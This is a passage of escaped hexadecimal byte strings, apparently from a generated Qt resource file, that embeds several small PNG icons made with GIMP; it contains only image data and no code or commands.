\\x71\\\n\\x8a\\x18\\x8e\\x8d\\x9d\\x49\\x33\\x7d\\xfe\\x1d\\x92\\x9d\\x9f\\x50\\xb8\\xc3\\\n\\x9d\\xd9\\x96\\x85\\x7d\\xd3\\xc9\\xd9\\x0b\\x5a\\x55\\xf9\\x62\\x91\\xf1\\x9e\\\n\\xab\\xd8\\x99\\x74\\x09\\xf8\\x5b\\xae\\x73\\xbd\\xc6\\xaa\\xb5\\xc5\\x5d\\xaa\\\n\\x46\\xd8\\xe3\\xc6\\x1b\\x08\\xce\\xaf\\xe2\\xd0\\xd0\\x10\\xe9\\xce\\xcb\\xe8\\\n\\x93\\x09\\xd4\\x70\\x1d\\x6a\\xfd\\x56\\x7c\\x35\\x61\\x5c\\x2e\\xd7\\x5c\\x98\\\n\\x34\\x3d\\xc2\\x94\\xbf\\x8c\\x50\\x22\\xb6\\x6e\\x47\\x56\\x97\\xf4\\xcd\\xd0\\\n\\xfd\\xaa\\xc1\\xa2\\x8e\\xca\\xe7\\x27\\x70\\xf8\\xd9\\x79\\xf9\\xa6\\x27\\x27\\\n\\xe9\\xfa\\xc9\\x49\\xc6\\x4e\\xfc\\x2b\\x55\\x33\\x13\\xc8\\x65\\xe5\\xe4\\xf6\\\n\\x1f\\x64\\xdb\\x1f\\xfc\\x31\\x4d\\x4d\\x4d\\xe8\\xba\\x8e\\x19\\x2a\\x47\\x2b\\\n\\x0b\\x91\\xbf\\xa1\\xa0\\x5b\\x45\\x36\\x62\\x28\\xf7\\x63\\x6a\\x39\\x24\\xa4\\\n\\xbc\\x7e\\x3e\\xed\\xea\\xe6\\x11\\x7f\\x90\\x40\\x20\\x40\\x76\\xa0\\x0f\\xeb\\\n\\xcc\\x69\\x3c\\x63\\xc3\\xd8\\x76\\x11\\x3b\\x95\\x64\\x30\\x39\\x4b\\xa0\\xb1\\\n\\x89\\x70\\xc0\\x87\\xa2\\x1b\\x88\\xd8\\x28\\xe5\\xc1\\x20\\x19\\xc7\\xd9\\x90\\\n\\xd5\\x5f\\xb5\\x10\\xb0\\x1d\\x87\\xdc\\xf4\\x34\\xd7\\x5f\\x3f\\x49\\x32\\x1e\\\n\\xc7\\x5f\\x13\\x46\\x3a\\xff\\x16\\xa2\\xb7\\x1b\\xc3\\xbe\\xbd\\xb2\\x91\\xc9\\\n\\x18\\xf9\\x9f\\x9c\\xe0\\x9a\\x70\\x50\\x8b\\x05\\x66\\xce\\xfd\\x02\\xeb\\xca\\\n\\x67\\xc8\\xb6\\xb5\\x21\\xe0\\x17\\xad\\x02\\x2b\\x6d\\x95\\x17\\x34\\x1d\\xbb\\\n\\xac\\x82\\x5c\\x65\\x35\\x7a\\x74\\x04
\\x3d\\x3a\\x72\\x0f\\xcd\\xa9\\xc8\\x15\\\n\\x55\\xd8\\x13\\xe3\\x77\\x6d\\x73\\x37\\x3d\\x01\\x25\\xaa\\xe0\\xe1\\x39\\x7e\\\n\\x72\\xbf\\x23\\x32\\x4b\\x4a\\xbe\\x9b\\xf5\\x84\\xd8\\x83\\xc0\\x2f\\xd9\\x07\\\n\\xac\\xe5\\x8b\\x0b\\xce\\x1a\\x26\\x40\\xf9\\xe8\\x6f\\xef\\x5b\\x91\\x13\\x5c\\\n\\x6f\\x25\\xac\\x95\\xf3\\x5b\\xf2\\x41\\xc9\\x87\\x81\\x84\\x8d\\x00\\xbf\\x22\\\n\\x2b\\xbc\\x1e\\xef\\xf1\\x7c\\x2e\\x35\\x45\\xb6\\xfe\\xd3\\xaa\\x1d\\x96\\xde\\\n\\x6c\\x4a\\xa8\\x3b\\xfd\\xdf\\x52\\x5b\\x5b\\xdb\\x92\\xfe\\xaf\\x74\\x3a\\x2d\\\n\\x4c\\xd3\\x74\\xbe\\x30\\x2f\\x4c\\xec\\xfb\\xdf\\x2e\\x29\\x10\\x08\\xa0\\xaa\\\n\\xaa\\xf3\\x20\\xe0\\xb7\\xd4\\x6f\\x9a\\xa6\\xb5\\xe9\\x5f\\x99\\xa9\\x38\\xf1\\\n\\x53\\xa9\\xb5\\xb5\\x75\\xfe\\xf7\\x07\\x9d\\x7b\\x4e\\xa7\\xd3\\xd2\\xcd\\x06\\\n\\x97\\x30\\x4d\\xd3\\x5e\\xd5\\x78\\x5e\\x6f\\x22\\x96\\x9b\\x8f\\x16\\x9e\\x8a\\\n\\xbf\\x45\\xd6\\x9a\\x24\\xb4\\xb5\\x26\\xe2\\xa1\\x7c\\x6d\\x6e\\xad\\xc9\\xd8\\\n\\x34\\x2f\\x4e\\xae\\x16\\x19\\x0f\\x7b\\xb9\\xfd\\xd5\\xf8\\xa2\\x8c\\xff\\x03\\\n\\x09\\x55\\x0d\\xa4\\x3d\\x7d\\xc0\\x88\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\\n\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x05\\xb0\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x12\\x1a\\x14\\xda\\xdb\\x8c\\xbb\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x05\\x14\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x9b\\x4d\\\n\\x4f\\x1b\\x57\\x14\\x86\\xdf\\xb9\\x33\\x63\\xc3\\x2c\\xc0\\xe0\\xa1\\x96\\x33\\\n\\x18\\x44\\xd4\\x08\\xc4\\x57\\x22\\x3e\\x56\\x35\\xa9\\x84\\x54\\x65\\xc3\\x06\\\n\\xac\\xa0\\xc8\\xc5\\x0b\\xaa\\x88\\x05\\x52\\x12\\xa9\\x8a\\x94\\x16\\x36\\xdd\\\n\\x55\\xfc\\x03\\x7e\\x03\\xe2\\x07\\xa0\\x2e\\x6a\\xb5\\x1b\\x24\\x04\\x82\\x05\\\n\\xa2\\x0a\\x42\\xa0\\x8a\\x1a\\x4a\\x64\\x04\\x0d\\xd1\\x8c\\xc7\\xf3\\x71\\xbb\\\n\\x28\\x76\\x0d\\xb1\\x3d\\x63\\xc7\\xc6\\x1e\\x3b\\x67\\x87\\x6c\\x8d\\xef\\xfb\\\n\\x9c\\xf7\\x9c\\xfb\\xc1\\x5c\\xe0\\x73\\xd4\\x77\\x30\\x77\\xf9\\x63\\x3f\\xbe\\\n\\x79\\x43\\x0b\\xf9\\xfe\\xcf\\x4b\\x4b\\x8c\\xa3\\x01\\x14\\x2a\\xb8\\x12\\x30\\\n\\x98\\x6a\\x16\\x7d\\x17\\x30\\x4a\\xf6\\xa0\\x68\\x34\\xea\\xfd\\x65\\x6d\\x2d\\\n\\x7e\\x97\\x25\\x55\\x0a\\x10\\x8c\\x53\\xb2\\x5e\\x2e\\x10\\x8c\\x93\\x85\\x97\\\n\\x02\\x02\\x53\\x0b\\xe2\\x53\\x71\\x4f\\x92\\x7e\\x78\\xf1\\xf2\\xe5\\x52\\xd9\\\n\\x01\\x54\\xa3\\xf8\\x62\\xdd\\x90\\xf7\\x8b\\xb2\\x2c\\x33\\x00\\x20\\x08\\x02\\\n\\x75\\x8a\\xf8\\x42\\x21\\x30\\xd9\\x04\\xdf\\x16\\xed\\x34\\xf1\\x85\\x40\\x60\\\n\\xec\\x08\\x77\\xa2\\x78\\xbb\\x10\\xb8\\x7c\\xa2\\x9d\\x2e\\xbe\\x24\\x4d\\xb0\\\n\\x16\\xc4\\xe7\\x73\\x01\\xa9\\x87\\x1d\\x5f\\xbe\\x24\\x92\\x7a\\xb5\\xbe\\x65\\\n\\x09\\xd4\\xa2\\xf8\\x6c\\xa5\\x50\\x17\\x25\\x90\\x2f\\xa9\\xa4\\x5e\\xad\\x5f\\\n\\x97\\x0e\\xc8\\x96\\xdc\\xba\\x03\\x60\\xe9\\x80\\x7a\\xb2\\xff\\x27\\x3b\\xe0\\\n\\xe2\\xf2\\x12\\xd3\\xcf\\x9e\\xe1\\x8f\\xb7\\x6f\\x1d\\x5b\\x06\\x5c\\x31\\x0f\\\n\\x88\\x9d\\x9c\\x60\\xf0\\xe1\\x43\\x7c\\xf7\\xfc\\x39\\x02\\x81\\x00\\x24\\x49\\\n\\x72\\xac
\\x03\\xb8\\x62\\xec\\xff\\xed\\xcc\\x0c\\x86\\x87\\x87\\xd1\\xd2\\xd2\\\n\\x02\\x55\\x55\\x71\\x12\\x8b\\xa1\\xa9\\xbb\\xdb\\xf9\\x00\\xec\\xc4\\x83\\xee\\\n\\x6e\\x04\\x83\\x41\\xb0\\x2c\\x0b\\x4a\\x29\\x92\\xc9\\x24\\xbe\\xf0\\xf9\\xea\\\n\\xa3\\x07\\xb4\\x78\\xbd\\x08\\x85\\x42\\x60\\x59\\x16\\xa6\\x69\\x42\\xd3\\x34\\\n\\x08\\x82\\x00\\x97\\xcb\\xe5\\xd8\\xe9\\xd0\\x36\\x00\\x45\\x55\\x11\\x0a\\x85\\\n\\x20\\x08\\x02\\x28\\xfd\\xbf\\x52\\x58\\x96\\xc5\\xd0\\xd0\\x50\\xed\\x3b\\x60\\\n\\x76\\x76\\x16\\x3e\\x9f\\x0f\\xba\\xae\\xa7\\x01\\x50\\x4a\\x41\\x08\\x41\\x47\\\n\\x47\\x47\\x6d\\x03\\xd0\\x4d\\x13\\x7e\\xbf\\x1f\\x0d\\x0d\\x0d\\x37\\xb2\\x4f\\\n\\x29\\x85\\xa6\\x69\\xf0\\xd5\\x7a\\x0f\\x98\\x9a\\x9a\\x82\\xc7\\xe3\\x81\\x69\\\n\\x9a\\x37\\xb7\\x92\\x0c\\x03\\x4a\\x29\\x44\\x51\\xc4\\xc1\\xe1\\x61\\x6d\\x02\\\n\\x38\\x3c\\x3a\\x42\\x5f\\x5f\\xdf\\x7f\\x4e\\xd0\\xf5\\x8f\\x3e\\x37\\x0c\\x03\\\n\\xcd\\xcd\\xcd\\x18\\x19\\x19\\x29\\x6a\\x00\\x99\\x8e\\xaa\\x18\\x00\\x45\\x51\\\n\\x72\\x9e\\x0b\\x88\\x6d\\x6d\\x48\\x24\\x12\\x79\\x07\\xea\\x76\\xbb\\x31\\x3f\\\n\\x3f\\x0f\\xc3\\x30\\x0a\\x3f\\x90\\xb8\\x76\\x91\\x69\\x9a\\x15\\x81\\x91\\x76\\\n\\x40\\x2c\\x16\\xcb\\x0a\\xa1\\xab\\xab\\x0b\\x6d\\x6d\\x6d\\x59\\xb3\\x9f\\x8a\\\n\\x64\\x32\\x09\\x42\\x08\\x9a\\x3c\\x9e\\xe2\\x4e\\x65\\x18\\x06\\x0c\\xc3\\x54\\\n\\xce\\x01\\x8d\\x8d\\x8d\\x54\\x92\\xa4\\xac\\xf8\\x7d\\x3e\\x1f\\x4c\\xd3\\x04\\\n\\x21\\xb9\\xab\\xc5\\x30\\x0c\\xb8\\x5c\\x2e\\x04\\x83\\xc1\\xa2\\x07\\x92\\x02\\\n\\x60\\x18\\xc6\\x47\\xbd\\xa6\\xa2\\x3d\\xa0\\xaf\\xaf\\xcf\\x72\\x40\\x0c\\xc3\\\n\\xc0\\x30\\x0c\\x0c\\x0c\\x0c\\xe0\\xf2\\xfd\\xfb\\x4f\\x82\\xc0\\xb2\\xec\\x9d\\\n\\xf6\\x06\\x4b\\x00\\x3b\\x3b\\x3b\\xe0\\x38\\xce\\x56\\x56\\x5a\\x5b\\x5b\\xb1\\\n\\xb8\\xb8\\x88\\x3f\\x8f\\x8f\\x2d\\x1b\\x5f\\x3e\\x81\\xa9\\xbe\\x90\\x2a\\xbb\\\n\\x72\\xc0\\x48\\x9d\\x0f\\x5a\\x02\\x48\\x26\\x93\\xd0\\x75\\x3d\\x9d\\x99\\x5c\\\n\\x61\\x9a\\x26\\x14\\x45\\x41\\x73\\x73\\x33\\x22\\x91\\x08\\x62\\x27\\x27\\xb6\\\n\\x2c\\x9f\\xeb\\x33\\x42\\x48\\xba\\xec\\xca\\xd9\\x1f\\x48\\x36\\x2a\\x99\\xb1\\\n\\xbf\\xbf\\x9f\\xee\\xd2\\x76\\x82\\xe7\\x79\\x8c\\x8e\\x8e\\x62\\xec\\xf1\\xe3\\\n\\xa2\\xc4\\xdf\\x18\\x1c\\x21\\x95\\x2f\\x81\\xb3\\xb3\\x33\\xc4\\xe3\\x71\\x70\\\n\\x9c\\xbd\\x8d\\x23\\xa5\\x14\\x5e\\xaf\\x17\\xe1\\x70\\x18\\xf7\\xda\\xdb\\xab\\\n\\x72\\xf1\\x93\\x99\\x68\\x4b\\x00\\x1d\\xed\\xed\\xb8\\xb8\\xb8\\x00\\xcf\\xf3\\\n\\xb6\\x32\\x47\\x29\\x85\\x2c\\xcb\\xe0\\x79\\x1e\\x73\\x73\\x73\\x18\\x7c\\xf4\\\n\\xc8\\x59\\x2b\\xc1\\x6c\\x65\\xb0\\xb4\\xb4\\x84\\xd3\\xd3\\x53\\xcb\\x3e\\x90\\\n\\x69\\x71\\x5d\\xd7\\xc1\\x71\\x1c\\x26\\x27\\x27\\xd1\\x3f\\x38\\xe8\\xec\\xbd\\\n\\x80\\xe4\\xf7\\x63\\x7d\\x7d\\xbd\\xe0\\xba\\x54\\x55\\x15\\x84\\x10\\x84\\xc3\\\n\\x61\\xbc\\x78\\xf5\\x0a\\xda\\xad\\x95\\x62\\xa5\\x97\\xc1\\x05\\x6d\\x87\\x57\\\n\\x57\\x57\\x71\\x75\\x75\\x05\\xb7\\xdb\\x9d\\x9e\\xa6\\x6c\\xed\\x24\\x75\\x1d\\\n\\x8a\\xa2\\x40\\x14\\x45\\xcc\\xcf\\xcf\\x43\\x0a\\x04\\xd2\\xd3\\x64\\x25\\x56\\\n\\x7f\\xb7\\x1d\\x5e\\xd0\\xff\\x06\\x8f\\x63\\x31\\x2c\\x2c\\x2c\\xa0\\xfb\\xfa\\\n\\xfc\\x4f\\x55\\x55\\xfb\\xa4\\x09\\x81\\xdb\\xed\\x06\\x00\\xec\\xee\\xee\\x62\\\n\\x73\\x73\\x13\\x1b\\x1b\\x1b\\xf0\\x34\\x35\\x55\\x27\\x80\\x5c\\x10\\x40\\x08\\\n\\x22\\x91\\x08\\x7a\\x7a\\x7a\\xa0\\x69\\x1a\\x34\\x4d\\xb3\\x5d\\x16\\x94\\x52\\\n\\xf0\\x3c\\x0f\\x8e\\xe3\\x70\\x7e\\x7e\\x8e\\xad\\xad\\x2d\\xfc\\x16\\x8d\\x56\\\n\\x4c\\x3c\\x00\\xe4\\xed\\x6a\\x63\\xc1\\xe0\\x4f\\x59\\x54\\xe0\\xd7\\x68\\x14\\\n\\x3c\\xcf\\xa3\\xb3\\xb3\\x13\\x82\\
[embedded binary resource data omitted: a length-prefixed run of several PNG image streams (each 64x64 px, 8-bit RGBA, iTXt comment "Created with GIMP"), apparently a generated Qt-style resource blob; the raw escaped byte strings carry no human-editable content]
\\x00\\x80\\x44\\x32\\x09\\x25\\\n\\x91\\x80\\xd7\\xeb\\x45\\x30\\x18\\x84\\x24\\x49\\xe0\\x79\\x1e\\x1e\\x8f\\x07\\\n\\x33\\x33\\x33\\x58\\x5c\\x5c\\xc4\\x9d\\x3b\\x77\\x30\\x3b\\x3b\\x8b\\x7f\\xe3\\\n\\x71\\x48\\x92\\x54\\x75\\xe1\\x2b\\x8a\\x00\\x23\\x24\\xe4\\x22\\xc5\\xb1\\x24\\\n\\x78\\x56\\xaa\\xfa\\x4a\\xde\\x06\\x8b\\x7d\\x0e\\xd7\\x2a\\xe0\\x3f\\xde\\xb3\\\n\\xc7\\x5f\\xb6\\x3a\\xa0\\x12\\xa7\\x37\\xca\\x6d\\x7d\\x7d\\x7d\\xff\\x14\\xac\\\n\\x5a\\x8b\\xbd\\x68\\xad\\xdc\\x3e\\x37\\xea\\x30\\xcb\\x3f\\x2c\\x5d\\xac\\x7d\\\n\\xd8\\xd3\\xb3\\x6b\\xef\\xde\\xbd\\x7f\\x18\\x9e\\x42\\x95\\xfa\\x47\\x56\\x24\\\n\\x21\\x3c\\x3c\\x4c\\x02\\x81\\x80\\xa1\\x75\\xc9\\xb2\\xcc\\x51\\x4a\\xd9\\x9a\\\n\\x39\\x30\\xf1\\xd5\\xc9\\x93\\xc4\\xe9\\x74\\x42\\x14\\x45\\x56\\x08\\x78\\x46\\\n\\xff\\x28\\xa5\\x69\\xd3\\x8e\\xcc\\x2c\\xaf\\x0c\\xcd\\x6c\\x7a\\x42\\x03\\x03\\\n\\x64\\xcb\\x96\\x2d\\xd9\\xf7\\x85\\x9e\\x7b\\x96\\x65\\x99\\x00\\x60\\x00\\x38\\\n\\x4a\\xa9\\x5e\\xd6\\x95\\x2d\\x27\\x22\\x33\\x46\\xcb\\xcc\\xf7\\xaa\\x29\\x74\\\n\\x39\\xbc\\x9f\\x25\\xcb\\x14\\xd7\\x98\\x9d\\x1a\\x96\\x3c\\x36\\x67\\x36\\x19\\\n\\x35\\x73\\x70\\xb2\\x5c\\x64\\xd4\\x62\\xe1\\xf5\\xce\\x6a\\xd1\\xfe\\x03\\xbc\\\n\\x15\\x9b\\xfd\\x4d\\x74\\x8b\\x0e\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\\n\\x42\\x60\\x82\\\n\\x00\\x00\\x06\\x09\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x06\\x00\\x00\\x00\\xaa\\x69\\x71\\xde\\\n\\x00\\x00\\x00\\x06\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\\n\\xa7\\x93\\x00\\x00\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0b\\x13\\x00\\x00\\\n\\x0b\\x13\\x01\\x00\\x9a\\x9c\\x18\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\\n\\xe5\\x03\\x1d\\x12\\x1d\\x14\\x95\\x9a\\x1a\\x7c\\x00\\x00\\x00\\x1d\\x69\\x54\\\n\\x58\\x74\\x43\\x6f\\x6d\\x6d\\x65\\x6e\\x74\\x00\\x00\\x00\\x00\\x00\\x43\\x72\\\n\\x65\\x61\\x74\\x65\\x64\\x20\\x77\\x69\\x74\\x68\\x20\\x47\\x49\\x4d\\x50\\x64\\\n\\x2e\\x65\\x07\\x00\\x00\\x05\\x6d\\x49\\x44\\x41\\x54\\x78\\xda\\xed\\x9b\\xcd\\\n\\x4f\\x1b\\x47\\x18\\xc6\\x9f\\x99\\xdd\\xb5\\x61\\x91\\x88\\x11\\x4b\\x2d\\x77\\\n\\x31\\x28\\x51\\x1a\\x10\\x60\\x82\\x00\\x91\\x43\\x8d\\x12\\x11\\x55\\xb9\\xe4\\\n\\x14\\x0b\\x12\\xa5\\xe6\\x40\\x15\\xa4\\xca\\x52\\x73\\xa8\\x22\\xa5\\xe5\\xd4\\\n\\x5b\\xe1\\x3f\\xe0\\xc2\\x3f\\x80\\x38\\x47\\xa8\\x4a\\x6b\\xb5\\x17\\x52\\xc4\\\n\\x47\\x0e\\x51\\x9a\\x20\\x14\\xd4\\x38\\x26\\x25\\x72\\x44\\xaa\\x20\\x7f\\xad\\\n\\x77\\xa7\\x87\\xb2\\x5b\\xa0\\xc6\\xbb\\x76\\xfc\\xb5\\x76\\xde\\x9b\\xf1\\x6a\\\n\\x99\\xe7\\x37\\xcf\\xfb\\xce\\x3b\\x23\\x0f\\xf0\\x31\\xea\\x3b\\x48\\x39\\xff\\\n\\xd9\\xf7\\xf7\\xef\\xb3\\x7c\\x9e\\xff\\x71\\x6e\\x8e\\xd8\\x1a\\x40\\xbe\\x82\\\n\\x2b\\x01\\x83\\x54\\xb3\\xe8\\x72\\xc0\\x28\\xda\\x8b\\xc2\\xe1\\x70\\xeb\\x4f\\\n\\xcb\\xcb\\xb1\\x72\\xa6\\x54\\x31\\x40\\x10\\xbb\\xcc\\x7a\\xa9\\x40\\x10\\x3b\\\n\\x0b\\x2f\\x06\\x04\\x52\\x0b\\xe2\\xf5\\xf8\\x54\\x96\\xbf\\xfb\\xe6\\xee\\xdd\\\n\\xb9\\x92\\x03\\xa8\\x46\\xf1\\x85\\xba\\x21\\xe7\\x83\\xf1\\x78\\x9c\\x00\\x80\\\n\\x28\\x8a\\xcc\\x2e\\xe2\\xf3\\x85\\x40\\xb2\\x09\\x3e\\x29\\xda\\x6e\\xe2\\xf3\\\n\\x81\\x40\\xac\\x08\\xb7\\xa3\\x78\\xab\\x10\\xf8\\x5c\\xa2\\xed\\x2e\\xbe\\x28\\\n\\x45\\xb0\\x16\\xc4\\xe7\\x72\\x01\\xad\\x87\\x1d\\x5f\\xae\\x49\\xa4\\xf5\\x6a\\\n\\x7d\\xd3\\x14\\xa8\\x45\\xf1\\xd9\\x52\\xa1\\x2e\\x52\\x20\\xd7\\xa4\\xd2\\x7a\\\n\\xb5\\x7e\\x5d\\x3a\\x20\\xdb\\xe4\\xd6\\x1d\\x00\\x53\\x07\\xd4\\x93\\xfd\\x3f\\\n\\xd8\\x01\\xfb\\xef\\xde
\\x61\\xe2\\xd6\\x2d\\xfc\\xf1\\xfc\\xb9\\x6d\\xd3\\x80\\\n\\x2f\\xe4\\x05\\xd1\\xdd\\x5d\\xf4\\x5f\\xbc\\x88\\xaf\\xee\\xdc\\x81\\xd7\\xeb\\\n\\x85\\x2c\\xcb\\xb6\\x75\\x00\\x5f\\x88\\xfd\\xbf\\x0c\\x06\\x31\\x34\\x34\\x84\\\n\\x96\\x96\\x16\\xa4\\x52\\x29\\xec\\x46\\xa3\\x68\\xee\\xea\\xb2\\x3f\\x00\\x2b\\\n\\xf1\\x59\\x57\\x17\\xfc\\x7e\\x3f\\x38\\x8e\\x03\\x63\\x0c\\xe9\\x74\\x1a\\x9f\\\n\\xb8\\xdd\\xf5\\x51\\x03\\x5a\\x5a\\x5b\\x11\\x08\\x04\\xc0\\x71\\x1c\\x34\\x4d\\\n\\x83\\xa2\\x28\\x10\\x45\\x11\\x0e\\x87\\xc3\\xb6\\xcb\\xa1\\x65\\x00\\x89\\x54\\\n\\x0a\\x81\\x40\\x00\\xa2\\x28\\x82\\xb1\\xff\\x32\\x85\\xe3\\x38\\x0c\\x0e\\x0e\\\n\\xd6\\xbe\\x03\\xa6\\xa6\\xa6\\xe0\\x76\\xbb\\x91\\xc9\\x64\\x0c\\x00\\x8c\\x31\\\n\\x50\\x4a\\xd1\\xd1\\xd1\\x51\\xdb\\x00\\x32\\x9a\\x06\\x8f\\xc7\\x83\\x86\\x86\\\n\\x86\\x63\\xb3\\xcf\\x18\\x83\\xa2\\x28\\x70\\xd7\\x7a\\x0d\\xb8\\x71\\xe3\\x06\\\n\\x5c\\x2e\\x17\\x34\\x4d\\x3b\\xbe\\x95\\x24\\x04\\x8c\\x31\\x48\\x92\\x84\\xed\\\n\\x17\\x2f\\x6a\\x13\\xc0\\x8b\\x9d\\x1d\\xf4\\xf6\\xf6\\xfe\\xeb\\x84\\x4c\\xe6\\\n\\x7f\\xdf\\xab\\xaa\\x8a\\x33\\x67\\xce\\x60\\x78\\x78\\xb8\\xa0\\x01\\x1c\\x75\\\n\\x54\\xc5\\x00\\x24\\x12\\x89\\x53\\xcf\\x05\\xa4\\xb6\\x36\\x24\\x93\\xc9\\x9c\\\n\\x03\\x75\\x3a\\x9d\\x08\\x85\\x42\\x50\\x55\\x35\\xff\\x03\\x89\\x43\\x17\\x69\\\n\\x9a\\x56\\x11\\x18\\x86\\x03\\xa2\\xd1\\x68\\x56\\x08\\x67\\xcf\\x9e\\x45\\x5b\\\n\\x5b\\x5b\\xd6\\xd9\\xd7\\x23\\x9d\\x4e\\x83\\x52\\x8a\\x66\\x97\\xeb\\x38\\x3c\\\n\\x49\\xb2\\x0c\\x81\\x10\\x52\\x39\\x07\\x34\\x36\\x36\\x32\\x59\\x96\\xb3\\xe2\\\n\\x77\\xbb\\xdd\\xd0\\x34\\x0d\\x94\\x9e\\x9e\\x2d\\xaa\\xaa\\xc2\\xe1\\x70\\xc0\\\n\\xef\\xf7\\x1b\\x7f\\x1b\\xbb\\x7a\\x15\\x5f\\x87\\x42\\xb8\\x7c\\xe5\\x8a\\x65\\\n\\x08\\xfa\\xbb\\x4e\\xd6\\x9a\\x8a\\x76\\x82\\xbd\\xbd\\xbd\\xa6\\x03\\x22\\x84\\\n\\x40\\x55\\x55\\xf8\\x7c\\x3e\\x6c\\x6c\\x6c\\x20\\x18\\x0c\\x82\\x31\\x96\\xb7\\\n\\xa5\\x09\\x21\\x46\\x93\\xc5\\x18\\x2b\\x8b\\x2b\\x4c\\x8b\\xe0\\xe3\\xc7\\x8f\\\n\\xc1\\xf3\\xbc\\x29\\x04\\xc6\\x18\\x44\\x51\\xc4\\xf4\\xf4\\x34\\x16\\x16\\x16\\\n\\xb0\\xfc\\xe0\\x01\\x18\\x63\\x38\\x38\\x38\\xc8\\xfa\\x6c\\x2e\\x38\\x7a\\x5d\\\n\\xd0\\xd3\\xae\\x14\\xb5\\x41\\x3f\\x1f\\x34\\x05\\x90\\x4e\\xa7\\x91\\xc9\\x64\\\n\\xc0\\x71\\x5c\\xce\\xe7\\x34\\x4d\\x33\\x8a\\xe0\\xc0\\xc0\\x00\\x40\\x29\\x08\\\n\\x21\\x88\\xbc\\x7c\\x99\\xd3\\xf2\\xa7\\x7d\\x47\\x29\\x35\\xd2\\xae\\x94\\x4e\\\n\\xa0\\xd9\\xa8\\x1c\\x8d\\xad\\xad\\x2d\\xa3\\x4a\\x9b\\xd9\\x97\\x52\\x0a\\x41\\\n\\x10\\x30\\x3c\\x3c\\x8c\\x91\\x91\\x11\\x24\\x12\\x09\\x24\\x93\\xc9\\xbc\\xc4\\\n\\x1f\\x1b\\x1c\\xa5\\x95\\x4f\\x81\\xbd\\xbd\\x3d\\xc4\\x62\\x31\\xf0\\xbc\\xb5\\\n\\x8d\\x23\\x63\\x0c\\xad\\xad\\xad\\xf0\\x7a\\xbd\\x86\\x7b\\xf4\\xf0\\xf5\\xf7\\\n\\x57\\x45\\xf3\\x73\\x74\\xa2\\x4d\\x55\\x75\\xb4\\xb7\\x63\\x7f\\x7f\\x1f\\x1e\\\n\\x8f\\x07\\xaa\\xaa\\x9a\\xe6\\x23\\x63\\x0c\\xf1\\x78\\x1c\\x00\\xe0\\x72\\xb9\\\n\\x70\\xfe\\xc2\\x05\\xec\\xbe\\x7a\\x85\\xf1\\x9b\\x37\\xc1\\xf3\\x3c\\x9e\\x3f\\\n\\x7b\\x86\\x74\\x3a\\x5d\\x35\\x9d\\x20\\x31\\x3b\\x32\\x02\\x80\\xe8\\xeb\\xd7\\\n\\x98\\x9d\\x9d\\x85\\x24\\x49\\x39\\xfb\\x81\\x93\\x35\\x41\\x10\\x04\\xa8\\xaa\\\n\\x0a\\x55\\x55\\xf1\\xf3\\xc3\\x87\\xf8\\xfd\\xd1\\xa3\\xaa\\x73\\x80\\xa5\\x24\\\n\\x93\\x3d\\x1e\\xac\\xac\\xac\\x58\\xce\\x4b\\xbd\\x5e\\x28\\x8a\\x02\\xc6\\x18\\\n\\x9a\\x9a\\x9a\\x30\\x72\\xe9\\x12\\x94\\x13\\x9d\\x62\\xa5\\xdb\\xe0\\xbc\\xb6\\\n\\xc3\\x4b\\x4b\\x4b\\x78\\xff\\xfe\\x3d\\x9c\\x4e\\xa7\\xb1\\x4c\\x99\\x15\\x2f\\\n\\xbd\\xc3\\x4b\\x26\\x93\\x90\\x24\\x09\\xa1\\x50\\
x08\\xb2\\xd7\\x8b\\x3f\\x23\\\n\\x91\\x92\\x57\\x77\\x2b\\xb3\\x7f\\x6a\\x0a\\x64\\x4b\\x03\\x00\\x88\\x44\\xa3\\\n\\x98\\x99\\x99\\x41\\xd7\\xe1\\xf9\\x5f\\x2a\\x95\\xca\\x59\\x0b\\x8e\\x0a\\xa4\\\n\\x94\\xc2\\xe9\\x74\\x02\\x00\\x9e\\x3c\\x79\\x82\\xb5\\xb5\\x35\\xac\\xae\\xae\\\n\\xc2\\xd5\\xdc\\x5c\\x9d\\x00\\x4e\\x83\\x00\\x4a\\x31\\x39\\x39\\x89\\xee\\xee\\\n\\x6e\\x28\\x8a\\x02\\x45\\x51\\x2c\\x2f\\x57\\x8c\\x31\\x08\\x82\\x00\\x9e\\xe7\\\n\\xf1\\xf6\\xed\\x5b\\xac\\xaf\\xaf\\xe3\\xd7\\x70\\xb8\\x62\\xe2\\x01\\x20\\x67\\\n\\x77\\x33\\xea\\xf7\\xff\\x90\\x45\\x05\\x7e\\x09\\x87\\x21\\x08\\x02\\x3a\\x3b\\\n\\x3b\\x21\\x8a\\xa2\\x69\\x4a\\xe8\\x0e\\xe0\\x38\\x0e\\x0e\\x87\\x03\\x4f\\x9f\\\n\\x3e\\xc5\\xe2\\xe2\\x22\\x96\\x97\\x97\\